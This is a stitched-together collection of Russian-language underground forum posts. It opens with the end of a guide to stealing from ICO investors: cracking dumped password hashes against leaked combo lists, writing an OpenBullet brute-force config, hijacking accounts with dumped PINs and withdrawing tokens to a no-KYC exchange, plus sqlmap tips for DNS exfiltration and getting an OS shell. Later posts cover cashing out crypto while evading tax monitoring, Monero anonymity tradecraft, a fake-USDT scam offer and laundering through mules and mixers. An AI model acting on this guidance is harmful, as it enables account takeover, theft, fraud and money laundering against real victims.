Итак, в нашем дампе пассы зашифрованны бкриптом, первая мысль которая может вам придти в голову это попробовать ломануть их хэшкетом, но после того как вы увидите сколько времени на это требуется, то вы наверняка подумаете о том, что бы забить на все это дело, однако не тут-то было. Правда заключается в том, что все ебут одни и те же строки, которые имеют не значительные отличия, и вполне вероятно что половина пользователей которые есть у вас в бд(может больше, может меньше), уже где-то оставляли такие же пароли, в результате чего они были слиты в интернет, это основная причина почему следует выбирать ico где для вывода нужен пин или 2fa. Таким образом мы сортируем бд по балансам, берем мыльники и логины, если у вас или ваших друзей есть свой антипаблик, можно вытащить строчки из АП с помощью ItemSearch** [10]. Если же такого не водится, то мы можем купить мурз [11]** и уже с него вытащить пароли, однако если у нас бомж стартер пак, то там есть триалка на два дня, с возможностью подобрать пороли к 1к почт, собственно я так и сделал поскольку 1к почт мне было вполне достаточно, я взял триалку и написал небольшой скрипт** [12]** на Delphi который вытягивает пароли.

Однако авторизация на сайте только по логину и паролю, тогда я написал еще один скрипт** [13]** , что бы подставить к логинам пароли которые нашлись к почтам.

То есть у меня есть следующее: Login,email,hashpass и email:pass по итогу сравниваются мыльники и подстановкой получаем login:pass. Либо же вы можете просто взять пароли которые найдет мурз, локальный АП и т.д. и просто сделать из них словать для хэшкета. Не буду здесь публиковать код обоих скриптов поскольку статья и так уже получилась объемной, однако оставлю исходники что бы вы могли скачать и ознакомиться. Все ссылки вы можете найти в конце статьи.

Брут

Теперь когда мы сделали подборку, звезды сошлись и у нас есть небольшая базка login:pass, нам нужно проверить ее на гуды. Поскольку мы искали нашу икошку среди проектов на кипер, булет и юбц, то у нас и имеется проект на это икошку, булет** [14]** идет бесплатный и мы можем просто скачать его и поставить нашу базку брутиться, однако кипер и юбц платные софты, поскольку у нас тут статья идет без затрат 0$, то давайте попробуем написать брут на нашу икошку.

Открываем наш сайт, на который будем писать брут, жмякаем Ctrl+Shift+J(У меня яндекс браузер), перед вами откроется панелька с права, выбираем на ней вкладку Network(Это наш снифер), вводим в поля логин и пароль любые данные и жмякаем войти, слева где Name должна появиться ссылка, также нажимаем на нее, и перед нами выйдет примерно аналогичная картина той, что была в нетспаркере когда мы собирали реквест файл, нам так же надо отсюда взять заголовки и постдату(Form Data это та самая Post Data, где id это наш логин, а pw это пароль). Бывает такое что там еще и токен попадается, тогда нам нужно сначало сделать гет запрос на главную страницу, спарсить токен, а потом вставить его в нашу пост дату, в целом про написание брута можно написать еще одну отдельную статью, т.к. здесь очень много инфы и маленьких деталей, по-этому не будем углубляться в такие детали. Подробнее про то как писать бруты можете найти в интернете. А еще лучше если возьмете с интернета готовые рабочие конфиги открытые для редактирования и смотря на них будете учиться делать проекты.

Во вкладке Response правее Headers мы можем посмотреть данный которые пришли в ответ.

Это нам пришло на рандомные данные

{"result":"N","msg":"This ID is not checked."}
Это на данные где пароль неверный

{"result":"N","msg":"Please check the input."}
А вот это уже на гуд

{"result":"Y","msg":"Login Successful"}
Судя по этим ответам и хидерам мы будем собирать проект. Открываем булет, переходим во вкладку Configs->New Указываем название проекта, слева жмякаем на плюсик, в открывшемся окошке выбираем Request и заполняем согласно данным со снифера.

Ну я думаю вы поняли что к чему. Сохраняем проект, запускаем и ждем пока наберутся гуды. Эта часть статьи получилась немного скомканной, однако если у вас возникнут вопросы или вам нужно будет помочь с написанием более сложного брута(например на мобильное приложение), то не стесняйтесь задавать вопросы.

Вывод на биржу и с биржи

После того как нашли гуды, нам нужно вывести баланс с ICO на биржу, смотрим на сайте на какие биржи мы можем вывести, и выбираем ту на которой не нужен вериф с доками для вывода, в нашем случае это latoken. Первый раз когда я попытался что-то там сделать у меня выбивало ошибку поскольку я сидел под VPN США, поэтому будьте внимательны, в США душат биток, юзайте впн другой страны.

Регаемся на бирже, переходим в кошелек, в поиске вбиваем нашу монету, клацаем депозит и биржа даст нам кошелек на который нужно перевести токены, дальше уже входите под сбрученными аккаунтами в личный кабинет ico и уже от туда выводите токены, я хз как будет у вас, лично у меня выводы были только по средам в определенное время, для подтверждения вывода нужно было ввести временный код который приходит на почту и 6 значный пинкод который был у нас в базе данных. Система такая, что для смены пинкода надо валидное мыло, а для смены мыла пинкод. Поэтому я сначала менял мыло на свое, поскольку знал пинкод, а потом уже подтверждал вывод с помощью кода который приходил на почту и того 6 значного пинкода который был в базе.

Потом когда монеты приходят на биржу(обычно приохдят с задержками, надо немного подождать), просто продаем их за битки и уже выводим на свой кошелек, вот собственно и все.

Пару слов туда сюда да …

Теперь несколько моментов которые я специально пропустил дабы не ломать повествование статьи:

1. Если вдруг вы найдете в бд куки, то на часть с написание брута и подбором паролей можете сразу забить т.к. коме этих кук вам больше ничего не понадобится для входа.
2. Вы можете использовать sqlmap для поиска уязвимостей
3. В случае если у вас слепая скуля, для ускорения дампинга можете использовать технику DNS Exfiltration(--dns-domain), более подробно можете легко нагуглить
4. В случае если у вас тип инъекции stacked queries и админская учетная запись(--is-dba), вы можете получить шелл (--os-shell)
5. Если гудов будет мало, вы можете попробовать побрутить сами мыльники и уже по ним восстановить аккаунты
6. Если у вас сайт с 2фа, то вы должны были обязательно сдампить колонку в которой хранятся ключи для гугл аутентификатора, скачиваете себе на мобилу аутентификатор, добавляете в него ключик (Enter a setup key) используете сгенерированные коды
7. В бд вполне вероятно могут храниться приватные ключи от разных кошельков, будьте внимательны, иначе можете пропустить большую сумму

Заключение

Вот собственно и подошла к концу статья, я раскрыл один весьма прибыльный кейс для исполнения которого вам не надо и копейки. Некоторые инструменты мы рассмотрели подробно, а некоторые только поверхностно и вскользь, поскольку это очень большая тема, трудно сразу рассказать про все инструменты в рамках одной статьи так, что бы ничего не забыть, как по мне, так каждый инструмент вполне заслуживает отдельной статьи, поскольку информации по ним имеется еще очень много, что хватит и на целую серию статей. Какие бы высококлассные инструменты у вас не были бы, без достаточного опыта и навыков вы не сможете раскрыть весь их потенциал. Я показал основные и самые значимые моменты, однако даже их достаточно, что бы самостоятельно провернуть подобное. Если после прочтения статьи у вас появились вопросы на которые вы не находите ответы, то я буду рад ответить на ваши вопросы, так же могу помочь с раскруткой скули, написанием брута и т.д. Спасибо за внимание!

Ссылки

1. https://a.pr-cy.ru/ Проверка посещаемости сайта
2. https://github.com/sqlmapproject/sqlmap Sqlmap
3. https://security.stackexchange.com/...f-increasing-the-risk-option-of-sqlmap/162982 Про левлы и риски
4. https://kali.tools/?p=816 Документация по Sqlmap
5. https://github.com/Ekultek/WhatWaf Модуль для определения WAF
6. https://github.com/EnableSecurity/wafw00f Модуль для определения WAF
7. https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3 Доп. материал про тамперы
8. https://www.navicat.com/en/download/navicat-premium Naviсat, незаменимая вещь
9. https://www.sendspace.com/file/l7an6k SQLRip
10. https://www.sendspace.com/file/4yc1pw ItemSearcher для поиска в локальном АП
11. https://myrz.org/main/index.php#learn-more Мурз
12. https://www.sendspace.com/file/c6ix3c Скрипт под парсинг с мурза
13. https://www.sendspace.com/file/4mrgmr Скрипт с подставкой паролей
14. https://github.com/openbullet/openbullet OpenBullet

Приветствую господа :smile8:
Возникли вопросы:

1. Каким способом надежнее всего выводить в fiat(рубли, доллары - наличность) криптовалюту ?

Я знаю всего несколько:

1. Биржа LocalBitcoins
2. Топ обменников BestChange.ru
3. Менялы с https://mmgp.ru/forumdisplay.php?f=87

Click to expand...

2. Какие обьемы безопасно гонять по карте ?
   Слышал про цифру до 600к рублей - оборот в месяц. А если выше, то какой-то алгоритм отправляет данные в ФНС, а далее в разработку МВД - экстремизм, наркотики.
   Как избежать этого и не светиться на " радарах" налоговой ?
3. Как удобнее получать валюту ?

1. На карту свою/мамы/папы/теты/бабушки/др. родственников
2. Наликом
3. На купленную дебетку
4. Через систему денежных переводов - swift, western union, золотая корона.

Click to expand...

Поделитесь plz своим опытом, не только мне думаю будет полезно :smile12:

Какая крипта из представленных двух в заголовке является наиболее анонимной по вашему мнению?

Всем привет! Всё просто!

Ставим официальный кошелёк blockchain, верифицируем по паспорту. В течении недели получаем 250 XLM на счёт. В приложении через SWAP меняем на bitcoin и выводим!

Blockchain.com | Buy Bitcoin, Ethereum and more with trust

Blockchain.com is the world's most popular way to buy bitcoin, ethereum and more with trust. Securely store, swap, trade and buy the top cryptocurrencies.

www.blockchain.com

Маск опубликовал фото с надписью STARBASE. В результате Starbase Token (STAR) подскочил на 6000% и разбился. Это произошло после того, как генеральный директор Tesla и SpaceX опубликовал в Twitter фотографию деревни Starbase, которая ранее носила название Бока-Чика. В деревне Starbase находится космодром компании SpaceX.

Starbase - это место, где расположен стартовый комплекс SpaceX. Никакого отношения оно не имеет к токену.

Разработчики токена Starbase поблагодарили Илона Маска за публикацию, которая привела к росту цифровой монеты.

Твит-трейдинг рулит. Или Маск-трейдинг, ХЗ. Мир катится в попу.

Не я автор, и никакого отношения к автору не имею, хочется услышать комментарии специалистов на эту тему, и получить, возможно более полные рекомендации.

Ссылка на статью: <https://telegra.ph/Monero-ne-anonimen-kak-otslezhivayut- XMR-Rekomendacii-dlya-anonimnosti-05-28>

Текст для тех, кто не хочет ходить по ссылкам

Monero отслеживается, есть реальный люди, хакеры, владельцы наркокартелей, которые получили реальные тюремные сроки, которых установили именно по платежам в Monero, эти люди меняли bitcoin на Monero, Monero на bitcoin и эти платежи все равно смогли проследить. В статье я расскажу, как отслеживают Monero, и дам Вам конкретные рекомендации пользования, чтобы максимально усложнить отслеживание.

Друзья, эта статья является текстовым вариантом, и по этой теме снято мною видео, текстовый вариант более полный и точный, поэтому рекомендованный, и все же рекомендую так же посмотреть видео по этой теме.

Я решил записать это видео и соответственно эту статью, по причине того, что если Вы начнете искать информацию про анонимные платежи, про риптовалюту, то Вы безусловно, найдете информацию о Monero, но 99% того что вы найдете, не содержит ни одной конкретной рекомендации по использованию, эти видео или статьи не содержат, они же наоборот вводят людей в заблуждение, говоря им о невероятной анонимности и люди услышав это совершают непоправимые ошибки, за которые приходится расплачиваться не блогерам, а людям.

Чтоб окончательно снять розовые очки, я приведу несколько примеров, это реальные истории хакеров, которых не могли поймать 7 лет, что говорит о их уровне как профессионалы, это не наркозакладчик, который использовал кошелек Monero, который взял на бирже Binance.

Ниже 3 источника на 3 разные кейса :

[ Суд над хакером в Финляндии заставил усомниться в анонимности

криптовалюты ](https://www.securitylab.ru/news/545607.php)

Отследив вымогателя по горячим следам, специалистам удалось восстановить всю цепочку действий в блокчейне.

 www.securitylab.ru

более подробно о кейсе выше

__https://www.reddit.com/r/Monero/comments/19emsfe/finlands_national_bureau_of_investigation_claims

И ниже старый кейс по wannacry


[ Tracing the WannaCry 2.0 Monero Transactions

](https://medium.com/@nbax/tracing-the-wannacry-2-0-monero- transactions-d8c1e5129dc1)

Contributors: Nicolas A. Bax, PhD and an unnamed contributor.

medium.com

И этого года кейс с нарко магазином

https://www.justice[.]gov/opa/media/1352571/dl

Друзья, сейчас поговорим о методах отслеживания Monero, и после в конце я дам конкретные рекомендации, чтобы максимально усложнить отслеживание.

Как же отслеживают Monero:

1. Биржи. Все биржи, например Binance и другие ежеквартально передают информацию по ВСЕМ транзакциям внутри биржи в виде csv списков, включая всю информацию XMR, включая адреса кошельков. Передают они эти списки всем кто занимается отслеживанием и расследованиям по крипте, например Chainalysis; Это очевидно, но нужно проговорить, если вы отправляете или получаете Monero используя кошелек биржи, то ни о какой анонимности вообще речи быть не может, биржа запоминает адрес кошелька, сумму, дату и время, ip адрес и вообще все что можно запомнить; Поставьте знак равно между Binance и всеми обменниками которые есть на bestchange, все эти обменники используют являются партнерами какой-то крупной или не крупной биржи, и они всю сохраняют всю информацию о вас во время создания заявки, почту, ip адрес, кошелек с которого вы им отправляете деньги и кошелек куда вы их отправляете, об этом стоит помнить;

2. Объемы, время, статистическая вероятность. Сейчас мы рассмотрим несколько примеров:

Первый пример: представим на примере что отслеживается кошелек XMR на который было отправлено 100$ (эквивалент), далее человек поменял где-то на bestchange XMR на bitcoin и через 1 час, на биржу Binance был сделан депозит в btc, размере 100$ (эквивалент) и далее вывел себе на карту. Какова вероятность что таким образом идентифицирует владельца XMR кошелька? Очень-очень низка, потому как 1000-чи других пользователей делали аналогичные депозиты в других криптовалютах на других биржах и тд., но представим что на протяжении месяца это повторилось 25 раз, 25 раз был осуществлен перевод в 50-150$ на этот кошелек, и 25 раз, был получен депозит на Binance в btс, то в данном случае статистическая вероятность случайности таких депозитов сводится к невозможному и таким образом строится связь между кошельком XMR и аккаунтом Binance.

Второй пример: вымогатель требует выкуп 250.000$ в биткоина, это 3.62 btc, и ему платят 3.62 btc, он знает, что биткоин отслеживается и идет на биржу, которая не просит KYC, т.е. каких-либо документов и меняет несколькими платежами свой BTC на XMR, и т.к. он не доверяет этой бирже, он несколько раз пересылает по холодным кошелькам XMR, и после этого меняет где-то XMR на bitcoin и отправляет это на биржу Binance, чтоб вывести эти средства себе на счет. Казалось бы сложная цепочка, Bitcoin > XMR > XMR > Bitcoin, и это возможно отследить, а все из-за объема и временного промежутка. Объем в 250.000$ достаточно большой, и даже если в промежуток времени неделю, возможно всего 1 или 2 подобных операции будут, именно на эту сумму, что очень упрощает отслеживание, т.к. такие операция очень выделяются среди массы другие;

3. Узлы. Существуют плохие узлы XMR которые могут быть нацелены на деанонимизацию пользователей. Я не буду сильно вдаваться в подробности лишь скажу какую информацию узлы могут о вас собирать, это: ваш ip адрес, включая даже изменения Вашего ip адреса например сегодня, и спустя неделю, при каждом новом заходе на кошелек (например вы не пользовались кошельком неделю и открыли кошелек, он запросит обновление блокчейна у узла с того места на котором остановился неделю назад, таким образом узел поймет что пользователь неделю назад и сейчас один и тот же человек). Также плохой узел знает ваш часовой пояс и ваше время онлайн в кошельке, когда вы его открываете и закрываете, таким образом собирается дополнительная статистическая информация, это все то касается пассивного сбора, есть так же атаки, которые могут применятся плохими узлами при проведении вам транзакций, например когда вы хотите кому-то отправить XMR, вы запрашиваете у узла 11 адресов, 10 из которых фейковых, и при совершении транзакции узел не знает точно какие адреса фейковые, а на какой вы отправляете XMR, и узел может изменить 5-6 фейковых адресов, и если транзакция пройдет успешно, значит те адреса которые он подменил точно фейковые, и соответственно в других 5-6 адресах находится истинный адрес. Если же происходит так, что узел изменил адреса настоящего адреса, на который вы хотели отправить XMR, то вы получите ошибку и транзакция не пройдет, соответственно узел узнает, что адрес, на который вы хотели отправить был среди тех 5-6 адресов. Плохой узел может проводить такие атаки много раз, до тех пор, пока не узнает на 100% какой именно адрес из 11-ти настоящий.

4. Свой узел. Исходя из причины выше можно сделать вывод что нужно иметь свой узел, но плохие парни тоже пришли к этому выводу, и они стали мониторить ВСЕ узлы, которые появляются, а именно их дата и время появления, а также время их работы и транзакции которые с них идут. Например, хакер знает об этом, и 22.04 и на протяжении недели, до 29.04 он им пользовался пока совершал какие-то сделки, а потом он стал ему не нужен, и он удалил его с сервера. И те, кто занимаются расследованием и отслеживанием Monero отслеживают и другие узлы тоже, и они заметят появление новых узлов так же, как и их выключение, и представьте, что хакер включал свой узел только в момент, когда ему нужен был кошелек, насколько тогда это будет выделятся с общей массы. Относительно анонимности узла, если установят конкретную связь кошелька с узлом, то это огромное количество информации, которую человек указывал при создании узла, такая как почта, ip адреса, с которого он настраивался и реквизиты оплаты, входы в панель. Отдельная история почта, которая указывалась при создании, насколько анонимна она? И еще касательно узла, при его создание у вас будет выбор, сделать ли его доступным для всех, или он будет обрабатывать исключительно Ваши транзакции. Если сделать его доступным для всех, мы помогаем не только сети Monero, а еще и пропускаем через наш узел чужие транзакции, благодаря которых НАШИ транзакции будет сложнее идентифицировать среди массы других, что конечно же увеличивает нашу анонимность.

5. Блокчейн обозреватели. Например вы сделали транзакцию и хотите проверить прошла подтверждена ли она, дошли ли Ваши XMR до получателя, или Вы получатель этой транзакции, что Вы делаете, открываете блокчейн обозреватель и ищите/смотрите в нем детали по транзакции, в это время обозреватель блокчейна в котором вы смотрите записывает Ваш ip адрес, часовой пояс, могут запускаться скрипты активного сбора информации о Вашей системе, фингерпритны и тд., что строит конкретную связь Вас с этим кошельком.

6. Миксеры, сервисы отмыва крипты. Миксеры имеют 2 проблемы, первая это то, какие вы деньги получаете на свои кошельки? Т.е. кто-то в миксер загнал деньги, полученные с продажи наркотиков или оружия в США, и эти деньги с миксера могут попасть Вам на Ваш кошелек, взамен тех, которые вы отдадите в миксер, и за этими деньгами придут к Вам. Вторая проблема в том, что все большинство таких сервисов хонипоты, т.е. специально созданы для того, чтобы собирать информацию о пользователях, даже если сервис таким изначально не является, он может таким стать в последствии, например к нему наведаются сотрудники органов и принудят к такому сотрудничеству, а я напомню, Вы оставляете этим сервисам свои другие кошельки, проследить которые до Вам возможно в десятки разы легче. Я лично не знаю какое решение тут будет адекватным, использовать несколько сервисов не самая лучшая идея, они все могут оказаться хонипотами, но при этом каждый возьмет свои 5%-10% за услугу.

7. Плохие удобные холодные кошельки Atomic Wallet, Exodus. В чем минус, к примеру Atomic Wallet считается не безопасным кошелеком, а Exodus, там 2 причины, то что я прочитал он имеет проблемы с анонимностью и сейчас там XMR не работает, а именно кошелек не синхронизируется с блокчейном, т.е. вам на кошелек попадает монета, но на кошельке отображаться она не будет, иза

И обещанные рекомендации :

1. Пользуемся только проверенными холодными кошельками c открытым исходным кодом, например официальный кошелек Monero GUI Wallet, Monero CLI Wallet, и другие feather, Cakewallet

2. Используем в кошельках исключительно СВОЙ узел XMR, который будет начнет работать за неделю/месяц/ до того, как он нам понадобится и продолжит работать еще месяц/два/три после того, как он будет вам не нужен. Запустите уже СЕЙЧАС свой узел, чтоб когда он Вам понадобится он уже был в сети. Создавайте узел анонимно, анонимный VPS с оплатой в XMR, и анонимная его настройка.

3. На СВОЙ узел подключаемся как минимум с VPN+proxy+виртуализация / whonix. Узел наш, он безопасный, но на уровне хостера и провайдера могут вестись логи.

4. Кошелек НЕ должен подключатся к узлу за час до проведения транзакции, т.к. это тоже отслеживается, момент синхронизации кошелька с узлом, т.е. лучше всего если кошелек всегда будет синхронизирован;

5. Покупаем XMR анонимно используя Tor+vpn/socks (VPN/socks чтоб не поймать

6. через обменники с bestchange. Тут зависит от того, что у вас есть на старте, но суть одна, анонимная почта, чистый ip, заходим создаем заявку и меняем, чтоб на выходе получить XMR на холодный кошелек. К примеру покупаем за фиат/наличку LTC за LTC > XMR. К сожалению, bestchange не лучшая идея использовать, но это явно лучше бирж и дешевле. Покупайте небольшими объемами (до 5к$-10к$) и будьте готовы что у вас могут попросить паспорт, хотя обычно не просят. Если Вы нашли биржу/обменник, который кажется именно то, что Вам нужно, т.е. максимально анонимный и не просит никаких документов никогда, то это скорее всего хонипот.

7. После захода денег на Ваш холодный кошелек погоняйте их по другим холодным кошелькам, хотя бы 3-4 раза, это добавит анонимности и если будет все очень плохо, то это очень поможет Вам в суде и даст возможность «правдиво отрицать», т.к. таким образом создаются множество фейковых переводов.

8. Давайте деньгам полежать, не переводите их сразу, выжидайте дни, а лучше недели и месяца. Это сильно усложнит анализ и отслеживания.

9. Расходуйте (выводите) частями, не нужно все и сразу на один кошелек большим объемом. В блокчейне большинство транзакций от 1xmr до 100xmr, другие объемы будут сильно выделятся.

10. Старайтесь всеми возможностями избегать бирж каких-либо пересечений с биржами, обменниками, особенно крупными такими как Binance, Huobi, Yobit и другими. При этом не нужно слепо доверять «сервису анонимного обмена крипты».

11. Меняйте кошельки систематически свои кошельки, потратили в ноль, не пополняйте старый, создавайте новый.

12. Не используем блокчейн эксплореры – это хонипоты.

13. Сервисы/телеграм боты для проверки AML и тд. – это хонипоты.

**Очень важное замечание друзья, возможность отслеживания XMR это лишь статистическая вероятность вашей связи с кошельком, и это может быть 50%, 15% или <0.1%, но точно не 0%.

Источники**:

https://xss.is/threads/106855/

https://forum.exploit.in/topic/240919/

https://forum.exploit.in/topic/215095/

https://forum.exploit.in/topic/237059

[ Суд над хакером в Финляндии заставил усомниться в анонимности

криптовалюты ](https://www.securitylab.ru/news/545607.php)

Отследив вымогателя по горячим следам, специалистам удалось восстановить всю цепочку действий в блокчейне.

 www.securitylab.ru

__https://www.reddit.com/r/Monero/comments/19emsfe/finlands_national_bureau_of_investigation_claims

__https://www.reddit.com/r/Monero/comments/134jbdt/security_advisory_new_attack_from_malicious


[ Tracing the WannaCry 2.0 Monero Transactions

](https://medium.com/@nbax/tracing-the-wannacry-2-0-monero- transactions-d8c1e5129dc1)

Contributors: Nicolas A. Bax, PhD and an unnamed contributor.

medium.com

https://xmr.ru/logs/breaking-monero/ (все эпизоды интересные 1-13)

https://www.youtube.com/playlist?list=PLsSYUeVwrHBnAUre2G_LYDsdo-tD0ov-y

[ Эпизод 13 - Блокчейн-эксплорер OpSec ](https://xmr.ru/logs/breaking-

monero/episode-13/)

16/05/19 https://xmrchain.net https://exploremonero.com Стенограмма эпизода: Джастин: Привет всем и добро пожаловать на очередной эпизод Breaking Monero! Сегодня будет по-настоящему короткий эпизод, посвящённый основам безопасного использования блокчейн-эксплореров. В седьмом эпизоде мы уже...

xmr.ru

[ Эпизод 09 - «Отравленные» выходы (атака EAE)

](https://xmr.ru/logs/breaking-monero/episode-09/)

11/02/2019 Стенограмма эпизода: Джастин: Мы рады, что вы снова присоединились к Breaking Monero. Наш девятый эпизод будет посвящён помеченным выходам, EAWE атаке или Knack атаке. У этого явления есть несколько названий, и мы постараемся честно обсудить довольно сложную, полную нюансов тему, и мы...

xmr.ru

[ Эпизод 08 - Согласованные атаки по времени

](https://xmr.ru/logs/breaking-monero/episode-08/)

05/02/2019 Стенограмма эпизода: Джастин: Привет всем, с вами снова Breaking Monero, серия эпизодов, в которых нами критически рассматриваются ограничения, связанные с анонимностью и безопасностью Monero, чтобы люди узнали, что вообще такие ограничения из себя представляют. Меня зовут Джастин, и...

xmr.ru

[ Эпизод 07 - Удалённые узлы ](https://xmr.ru/logs/breaking-

monero/episode-07/)

24/01/2019 Стенограмма эпизода: Джастин: Рад снова приветствовать вас, это Breaking Monero, Сегодня Саранг и я поговорим об удалённых узлах и обсудим некоторые вопросы, связанные с их использованием. Всем нам уже известно, что удалённые узлы — довольно удобная вещь. Большинство кошельков любой...

xmr.ru

I have few million of fake Usdt ( Erc20 contract, on Ethereum network ).

And I can very easilly make more, and more. If needed I can make billions of it.

It can not be swapped to other crypto, but is recognized by Coinbase, Metamask, Trustwallet...
Probably some other wallets also, this platforms I know for sure is recognized by because I tested it.

Someone having idea what can be done with it ? Scaming someone 1 on 1 ?

Эта статья написана исключительно для просвещения и не призывает Вас совершать противозаконные действия!!!

Легализация денежных средств или иного имущества, полученных преступным путем. В этой статье я постараюсь изложить, что-же это на самом деле, как работают современные сервисы по оказанию подобных услуг, какие есть риски и как всего этого избежать. Так же постараюсь осветить все темные стороны этого процесса, тонкости и нюансы. Давайте по порядку.

Понятие «ГРЯЗЬ»

Многие думают, что деньги полученные от скам-проекта, это грязь, а ЗП полученная в конверте имеет серый оттенок или даже почти белый, но это заблуждение. На самом деле, разница только в их происхождении. Т.е. за скам светит срок по ст. 159 и в перспективе по ст. 198, а ЗП в конверте влечет ответственность по 198 ст. УК РФ. + Налоги, взносы, штрафы и пени.

Грязь- это деньги, имущество и т.д. , которые были скрыты их обладателем от контролирующих органов. Соответственно, тратить и владеть «грязью» публично- чревато. Ибо появится необходимость объяснять происхождение этого имущества. Многие ошибаются, когда думают, что, «полученные преступным путем» означает только: продажу наркотиков, оружия и других запрещенных товаров, также вымогательство и мошенничество, но это далеко не так.

Любая копейка, неотраженная в ваших доходах- это «грязь» и ответственность (наказание) одинаково для всех видов «грязи», разница лишь в том, откуда вы ее взяли. Для примера, давайте разберем такой случай: существует ООО «Стройдом», занимается строительством и имеет штат сотрудников. Чтобы не платить грабительские налоги, взносы и т.д. эти сотрудники не включены в штат и работают неофициально. Чтобы платить зарплату таким сотрудникам, необходима наличка. Поэтому директор обращается к обнальщикам, которые за процент обеспечивают его необходимым количеством. Далее этим серым налом, выплачивается зарплата в конвертах. На первый взгляд банальная ситуация , которая встречается очень часто. Бедный штукатур, получивший зарплату идет и кладет деньги на карту, так как носить «нал» в кармане неудобно, да, и вообще, удобней расплачиваться картой в «Пятёрочках» и «Магнитах». И делает он так регулярно, каждый месяц. Так вот, преступники в этой схеме и директор, и штукатур. Сначала «подтянут» штукатура, который расскажет откуда у него деньги, потом будет оштрафован, уплатит налоги и взносы, а потом возьмутся и за директора, которого ждет та же участь или того хуже. Все это начнет происходить уже в этом году. И все, подобные и многие другие случаи, будут вычислять в автоматическом режиме. То есть, все финансовые организации (банки) будут в онлайн-режиме оповещать ФНС о всех поступлениях и списаниях, связанных с вашим счетом, картой. Начиная вот от такого элементарного случая, я уже не говорю об откровенном воровстве или мошенничестве, возникает необходимость «отмыть» деньги. Так как, это и есть доход, полученный преступным путем.

Обнал, отмыв «грязи».

Теперь давайте разберемся, что это, как это работает и чем может обернуться. В сети встречается огромное количество сервисов, предоставляющих подобные услуги. Практически у каждого из них блестящая реклама, рядом с которой ночной Лас–Вегас -это дешевая гирлянда с перегоревшими лампочками. У всех космические депозиты, отзывы авторитетов из той же сети, стаж работы в теневом мире от 10 лет и т.д. Ну, давайте, взглянем на все это изнутри и посмотри какие же на самом деле нужны знания и инструменты, чтобы стать королем или лучшим сервисом «грязных» денег. Что представляет собой «обнал грязи». Вот тут уже нужно понимать, что это не наличка у вас в руках, а это значит, что кто-то переведет деньги на те реквизиты, которые вы укажете. Возьмет с вас за это проценты и немаленькие. И не факт, что получите именно отмытые деньги, а не те же самые, просто с другой карты. Для примера моделируем ситуацию: допустим у вас скам- проект, который принес вам 300К рублей, эти деньги лежат на карте, которая была куплена в сети(на дропа). Сами вы не пойдете в банкомат, по понятным причинам: камеры банкомата, на углах домов, свидетели и т.д. А маячить перед всеми в маске лошади или Франкенштейна , то еще удовольствие.

И, чтобы, всего этого избежать, вы и идете на «авторитетную площадку», с «авторитетными пользователями» и «авторитетными сервисами» по обналу «грязи», у которых: отзывы «авторитетов» и от 10 лет стажа в теневом мире. Разумеется, сервис должен быть проверенным и иметь депозит. Далее, обнальщик вам расскажет, что был рождён в бухгалтерии на столе главного бухгалтера, перед монитором, на котором было более десятка схем по обналичиванию и отмыванию доходов, а роды принимали Антонов, начальник отдела «К» и Бастрыкин. Поэтому, лучше сервиса вам не найти и его услуги стоят 30 %. Вы не сможете устоять перед таким предложением и согласитесь. И вот тут начинается колдовской час, открываются чакры и гений отмыва запускает свою, изобретенную по инопланетной технологии, машину, которая обналичит вашу «грязь».

Как это должно происходить и чем объясняется 30%-ная стоимость этой услуги:

1. Вы переводите «грязь» со своей карты (оформленной на дропа) на карту обнальщика ( на дропа);

2. Затем обнальщик переводит деньги в крипту и прогоняет через, так называемый «миксер» (стоимость 3% +-) поверьте, это та еще штучка! То, что вы получаете из миксера, может оказаться в десятки раз чернее того, что вы там пытались отмыть));

3. Затем, из миксера выводит деньги уже на другую карту, оформленную уже на другого дропа;

4. Идет в банкомат (посылает человека) и снимает деньги с карты, превращая их в нал;

5. Кладет деньги уже на совершенно новую карту (на дропа) ранее не засвеченную абсолютно нигде и переводит деньги на указанные вами реквизиты. О Боги! Свершилось! (по вашему и его мнению вы обналичили «грязь»).

Повторяю! Это то, как именно должна происходить процедура. Теперь давайте разберемся детально во всем этом и посчитаем все затраты, риски т.д. Ну, и поймем, наконец, что именно вы сделали. Для начала посчитаем заработок и расходы сервиса по обналу, и разберемся стоит ли овчинка выделки. Итак, по описанной выше схеме, мы видим, что сервису необходимо 3 карты на дропов для работы(стоимость одной 10-25К рублей). Берем по минимуму, 3 карты по 10К -30К рублей. Миксер 3% от 300К рублей -9 К рублей. Далее момент снятия денег после миксера, обычно это делает надежный дроп, ибо обнальщику не позволяют понятия заниматься такой грязной работой-около 10К рублей. Итого получается: 30% от 300К -90К, 3 карты 30К, 9К –комиссия за крипту и 10К дроп=41К рублей, это чистый доход сервиса при самом радужном раскладе. Все мы прекрасно понимаем, что таких цен уже давно нет и все это обходится сервису гораздо дороже. Но дабы не обидеть сервисы, которые действительно делают свою работу как надо, опустим этот момент и будем думать, что так и было. В противном случае нетрудно догадаться, что многие экономят на расходах в ущерб общей анонимности. Получают от вас «грязь», прогоняют через миксер и переводят деньги на ваши реквизиты. Это и есть «гениальная» схема, за которую вы платите 30%. Теперь давайте детально разберемся что же произошло и за что вы заплатили 30% на самом деле:

1. Вы получили 300К рублей от скам-проекта, это ст. 159;

2. чтобы уклониться от нее, вы прибегли к помощи сервиса по обналу «грязи», получили нужный результат и деньги на карту;

3. Теперь у вас на руках прибыль, полученная преступным путем и ее происхождение вы объяснить не можете. Соответственно, с этого дохода налог вы также не можете заплатить, а это ст.198;

4. Чтобы избежать наказания и за это, вам необходимо отмыть эти деньги, для дальнейшей покупки авто или вложения их в недвижимость, а вот отмывание- это уже ст. 174, и заехать за такие действия можно очень надолго и в очень холодный регион, где ваше здоровье заберет туберкулез и лишат зубов неприятные люди, задающие неприятные вопросы.

